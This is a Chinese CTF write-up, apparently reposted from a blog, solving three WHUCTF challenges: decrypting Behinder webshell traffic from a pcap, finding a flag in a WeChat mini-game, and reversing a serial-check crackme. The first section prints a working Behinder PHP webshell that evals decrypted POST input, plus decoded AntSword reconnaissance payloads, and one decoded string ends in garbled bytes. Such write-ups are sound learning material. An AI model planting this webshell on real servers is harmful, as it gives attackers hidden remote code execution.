提供了编程的基础技术教程

zl程序教程

您现在的位置是:首页 >  其他

当前栏目

[网络安全] 四十二.WHUCTF (5)两道隐写和一道逆向基础题(冰蝎流量解密、动静态逆向)

解密
2023-03-31 10:33:34 时间

文章目录:

  • 一.Misc-shellOfAwd 1.题目描述 2.解题思路
  • 二.Misc-wechat_game 1.题目描述 2.解题思路
  • 三.RE1 1.题目描述 2.解题思路
  • 四.总结

作者的github资源:

  • 逆向分析:https://github.com/eastmountyxz/ SystemSecurity-ReverseAnalysis
  • 网络安全:https://github.com/eastmountyxz/ NetworkSecuritySelf-study

声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。网站目前可以访问,后续应该会关闭,初学者可以试试,但切勿破坏。

一.Misc-shellOfAwd

1.题目描述

该题目提供的是一个pca文件,需要对其进行解密。

文件名称为“shellofAWD.pcapng”。

2.解题思路

由于之前没做过类似的题目,该题只能参考各位师傅的WP,当然pca文件我用Wireshark其它方面熟悉过。

出题思路 该题的考点是冰蝎的加密流量分析,它模拟了与Webshell交互的过程,给了一个流量包并用Wireshark分析。其出题思路为:

  • 在虚拟机中开一个Web服务,将蚁剑的base64马拖进去,通过蚁剑的马上传一个冰蝎的马,执行 ln -s /flag jquery.min.js,这样 jquery.min.js 就指向了 flag,读它就得到最终的flag。

下面解题参考师傅们的文章:

  • WHUCTF官方WP
  • 2020_WHUCTF_Writeup - Ly-sec-l师傅
  • http://www.peiqi.tech/posts/6576/#shellOfAwd-木马流量分析 - peiqi师傅
  • http://www.ga1axy.top/index.php/archives/36/#shellofawd - ga1axy师傅
  • whuctf.md - prontosil师傅

第一步,Wireshark软件打开文件。

  • shellofAWD.pcapng

打开流量包,过滤http可以发现两条pass=xxx的流量,这是冰蝎流量的特征。

第二步,任选其中一条,追踪TCP流,在流中可以看到有两个返回的长度为16的字符串,这是冰蝎流量的解密密钥。

冰蝎流量的解密密钥:

  • 第一次请求密钥:6d3246615ba4446d
  • 第二次请求密钥:91ee1bfc4fd27c90

追踪一下TCP也看到了一个密钥协商的阶段,如下图所示,密钥协商(木马特征)的两个步骤如下。

  • (1) 攻击者通过 GET 或者 POST 方法,形如 http://127.0.0.1/ shell.aspx?pass=645 的请求服务器密钥。
  • (2) 服务器使用随机数 MD5 的高16位作为密钥,存储到会话的 $_SESSION 变量中,并返回密钥给攻击者。

我们在翻看TCP流的时候可以看到在第五流之前都是蚁剑的base64加密流量,从5开始为冰蝎的加密流量(上图右下角流为5),且密钥为91ee1bfc4fd27c90。

第三步,通过在线网站行流量解密,解密流程是 AES解密–>base64解密—>原始数据。

我们需要知道的是冰蝎通常采用AES加密,可以参考:

  • 冰蝎动态二进制加密WebShell基于流量侧检测方案
  • 红蓝对抗——加密Webshell“冰蝎”攻防

选中一段流量进行AES在线解密。

  • http://tools.bugscaner.com/cryptoaes/

输出结果为解密后的信息,如下图所示:

得到base64加密的字符串,再次解密,可以看到这段解密结果为文件名称。

  • http://tool.chinaz.com/Tools/Base64.aspx

同样,我们可以尝试Python解密流量。下面请求表示:ant参数会执行 _0x6aa401ad3c537 变量内容,该参数此处执行了查看文件路径以及系统信息的命令。

>>> import base64
>>> s='ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtfMHg2YWE0MDFhZDNjNTM3XSkpO2RpZSgpOw=='
>>> base64.b64decode(s)
'eval(base64_decode($_POST[_0x6aa401ad3c537]));die();'
>>> t='QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZnVuY3Rpb24gYXNlbmMoJG91dCl7cmV0dXJuICRvdXQ7fTtmdW5jdGlvbiBhc291dHB1dCgpeyRvdXRwdXQ9b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7ZWNobyAiMmUwZWJlYTU1OTIiO2VjaG8gQGFzZW5jKCRvdXRwdXQpO2VjaG8gIjYyZTgwMGEwIjt9b2Jfc3RhcnQoKTt0cnl7JEQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pO2lmKCREPT0iIikkRD1kaXJuYW1lKCRfU0VSVkVSWyJQQVRIX1RSQU5TTEFURUQiXSk7JFI9InskRH0JIjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJDIiwiWiIpYXMgJEwpaWYoaXNfZGlyKCJ7JEx9OiIpKSRSLj0ieyRMfToiO31lbHNleyRSLj0iLyI7fSRSLj0iCSI7JHU9KGZ1bmN0aW9uX2V4aXN0cygicG9zaXhfZ2V0ZWdpZCIpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6IiI7JHM9KCR1KT8kdVsibmFtZSJdOkBnZXRfY3VycmVudF91c2VyKCk7JFIuPXBocF91bmFtZSgpOyRSLj0iCXskc30iO2VjaG8gJFI7O31jYXRjaChFeGNlcHRpb24gJGUpe2VjaG8gIkVSUk9SOi8vIi4kZS0%2BZ2V0TWVzc2FnZSgpO307YXNvdXRwdXQoKTtkaWUoKTs='
>>> base64.b64decode(t)
'@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "2e0ebea5592";echo @asenc($output);echo "62e800a0";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}	";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="	";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="	{$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e-6x05x9dx95xd15x95xcdxcdx85x9dx94xa0xa4xedxf4xedx85xcdxbdxd5xd1xc1xd5xd0xa0xa4xedx91xa5x94xa0xa4xec'

第四步,最终依次解密流量,获得最终flag值。

5U+SIO3pbt0CXFm7gLAx3xT7q0qDPFaCK8lNevS6Nrmak6Hhj9PXx3ZlGnMIgkqnqHmf6ba5VvtRMgJP6wUtoMXx5WeYJvobewjKDmZ8sSUCZJhKzzkX2ISKKy/snPv+6UOh5rBo6j/JvFGUOUjkKCbCe+nEGD9EKyv10Uu9KHU=

解密过程如下:

<?php
//$flag = "whuctf{cd768eac-0746-4979-a40d-5b6a269c4dde}"
?>

同时,作者补充冰蝎的一句话木马,其实也可以从流量中解密出来。后面作者会详细讲解一篇它的用法及原理,也推荐大家仔细阅读先知社区的那篇文章:

  • 红蓝对抗——加密Webshell“冰蝎”攻防
<?php
@error_reporting(0);
session_start();
if (isset($_GET['shell']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __construct($p) {eval($p."");}}
	@new C($params);
}
?>

二.Misc-wechat_game

1.题目描述

该题目提供的是一个minigame-1.7z文件,需要从中获取flag。

文件解压之后如下图所示:

看到游戏我们就可能比较蒙,但我们先审查文件看看有什么蹊跷没有。

2.解题思路

第一步,我们在审核文件时,发现txt文件夹下的“game12345.txt”文件问题,它的时间和其他的不太一样喔!

也就是说作者编译程序之后才加的flag,注意时间是什么时候,比赛快开始的时候,那flag肯定在里面。打开该文件显示如下图所示:

第二步,分析“game12345.txt”文件发现汉字是逆序的,那么是否能直接搜索flag呢?

顺序格式:whuctf{} 逆序格式:}{ftcuhw

搜索ftcuhw显示结果如下,flag值为:whuctf{wechat_g4m1}。

但其实这是出题人失误了。另一种解题方法是这样的:

  • 使用微信开发者程序中打开该工程。模拟运行后,程序入口为main.js。接着分析main.js,找到了分数变化的函数。

子弹击中后会将分数加1。根据题目提示,改为每次加10000,再次编译运行,结束后得到flag。

最后补充武大CTF师傅的WP代码和参考文献,推荐大家学习。

  • 武汉大学CTF - PeiQi师傅
  • 2020_WHUCTF_Writeup - Ly-sec-l师傅
  • WHUCTF官方WP

三.RE1

1.题目描述

接下来是逆向分析的题目,给出的是WHURE1.exe程序。

运行结果如下图所示:

2.解题思路

逆向分析推荐大家动静态结合分析,这里我采用OD(动态)和IDA(静态)结合。

第一步,通过OD打开EXE程序显示如下所示。

第二步,在反汇编窗口右键鼠标,选择“查找”->“所有参考文本字串”。

我们看到了目标“gj, the flag is WHUCTF{%s}”。

第三步,选中该行内容,右键选择“反汇编窗口中跟随”。

接着定位到如下图所示位置,其中CALL WHURE1.003A1020为调用函数(003A1171),我们可以按下F2设置断点进行动态调式。

也可以将003A1176位置设置为新的EIP。

然后按下F7单步进入调试,下图展示了OD调试的过程。

第四步,用IDA打开EXE程序。

按下F5可以查看源代码。

第五步,找到“WHUCTF”字符串的位置,然后查看对应的源代码,即sub_401090()函数,接下来分析该源代码推断输出flag的情况。

对应的源代码为sub_401090()函数,如下图所示。

源代码为:

int sub_401090()
{
  char v0; // ST1C_1
  char v1; // ST18_1
  char v2; // ST14_1
  char v3; // ST10_1
  char v4; // ST0C_1
  unsigned int v5; // ecx
  char v6; // dl
  signed int v7; // edx
  __int64 *v8; // ecx
  __int64 v10; // [esp+0h] [ebp-30h]
  __int64 v11; // [esp+8h] [ebp-28h]
  __int64 v12; // [esp+10h] [ebp-20h]
  int v13; // [esp+18h] [ebp-18h]
  int v14; // [esp+1Ch] [ebp-14h]
  int v15; // [esp+20h] [ebp-10h]
  __int64 v16; // [esp+24h] [ebp-Ch]

  v13 = 0;
  v10 = 0i64;
  v11 = 0i64;
  v12 = 0i64;
  v14 = 9;
  v15 = 2;
  v16 = 0i64;
  ((void (__cdecl *)(const char *, char))sub_401020)(
    "                                                                                 __ 
",
    0);
  ((void (__cdecl *)(const char *, char))sub_401020)(
    " _ _ _     _                      _          _ _ _ _____ _____ _____ _____ _____|  |
",
    v0);
  ((void (__cdecl *)(const char *, char))sub_401020)(
    "| | | |___| |___ ___ _____ ___   | |_ ___   | | | |  |  |  |  |     |_   _|   __|  |
",
    v1);
  ((void (__cdecl *)(const char *, char))sub_401020)(
    "| | | | -_| |  _| . |     | -_|  |  _| . |  | | | |     |  |  |   --| | | |   __|__|
",
    v2);
  ((void (__cdecl *)(const char *, char))sub_401020)(
    "|_____|___|_|___|___|_|_|_|___|  |_| |___|  |_____|__|__|_____|_____| |_| |__|  |__|
",
    v3);
  ((void (__cdecl *)(const char *, char))sub_401020)("plz input your serial number
", v4);
  sub_401050("%7s", (unsigned int)&v16);
  v5 = 0;
  do
  {
    v6 = *((_BYTE *)&v16 + v5);
    if ( (unsigned __int8)(v6 - 48) > 9u )
    {
      sub_401020("error input !
");
      exit(0);
    }
    *((_DWORD *)&v10 + v5++) = v6 - 48;
  }
  while ( v5 < 7 );
  if ( (_DWORD)v12 != 5 )
  {
LABEL_10:
    sub_401020("wrong,check your input
");
    exit(0);
  }
  v7 = 0;
  v8 = &v11;
  do
  {
    if ( *(_DWORD *)v8 + *((_DWORD *)v8 - 1) + *((_DWORD *)v8 - 2) != 15
      || *(&v13 + v7) + *((_DWORD *)&v11 + v7 + 1) + *((_DWORD *)&v10 + v7) != 15 )
    {
      goto LABEL_10;
    }
    ++v7;
    v8 = (__int64 *)((char *)v8 + 12);
  }
  while ( v7 < 3 );
  sub_401020("gj, the flag is WHUCTF{%s}
", (unsigned int)&v16);
  return 0;
}

第六步,分析源代码。

(1) 输入为一个7字节的字符串。

(2) 输入大于48(数字0)。

(3) 第5个数字要为5。

(4) 进行三轮判断。

d3 + d2 + d1 =15
d7 + d4 + d1 =15

d6 + d5 + d4 =15
d8 + d5 + d2 =15

d9 + d8 + d7 =15
d9 + d6 + d3 =15

撰写的Python脚本如下所示,其中di表示第i个字节,动态调试发现d8=9 d9=2 。所以可以进行枚举,代码如下。

for d1 in range(5,10):
    d2=1
    d3=14-d1
    d4=11-d1
    d5=5
    d6=d1-1
    d7=4
    print(d1,d2,d3,d4,d5,d6,d7)

输出结果如下图所示,但题目提示“无重复数字”,故结果为“8163574”。

总结:3*3数独,满足行列和等于15,以及无重复数字即可。动态调试可以较快的分析清对输入变量的约束条件。

参考及推荐文章:

  • WHUCTF官方WP
  • 2020_WHUCTF_Writeup - Ly-sec-l师傅

四.总结

写到这里,这篇文章就介绍完毕,希望对您有所帮助。学安全近一年,认识了很多安全大佬和朋友,希望大家一起进步。这篇文章中如果存在一些不足,还请海涵。

  • 一.Misc-版权保护
  • 1.题目描述 2.解题思路
  • 二.Misc-过早了吗 1.题目描述 2.解题思路
  • 三.Misc-佛系青年BingGe 1.题目描述 2.解题思路
  • 四.总结

CTF初学者个人建议:

  • 多做CTF题目,多参加CTF比赛,多交流经验
  • CTF题目推荐BUUCTF,比赛每个月都有很多,大赛小赛,比如XCTF、KCTF、WCTF等
  • 每个优秀的CTF选手都有自己的工具库、脚本库、词典库
  • 多向优秀的安全团队学习,关注他们的公众号,甚至加好友,组队比赛
  • CTF比赛对找工作有帮助,但后续建议和漏洞挖掘实际工作结合起来

相关文章